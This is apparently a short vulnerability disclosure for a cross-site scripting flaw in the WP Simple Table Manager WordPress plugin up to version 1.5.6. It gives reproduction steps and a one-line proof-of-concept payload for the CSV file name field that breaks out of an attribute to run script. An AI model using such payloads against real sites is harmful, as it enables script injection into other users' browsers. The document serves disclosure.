Cross-Site Scripting (XSS) vulnerability in WP Simple Table Manager Plugin <= 1.5.6 at WordPress.
-
STEPS: 1.After installing the plugin, click Simple Table Manager. Then click Export CSV. Put poc in CSV file name then click Save.
POC:
"><img src=1 onerror=alert(/xss/)>



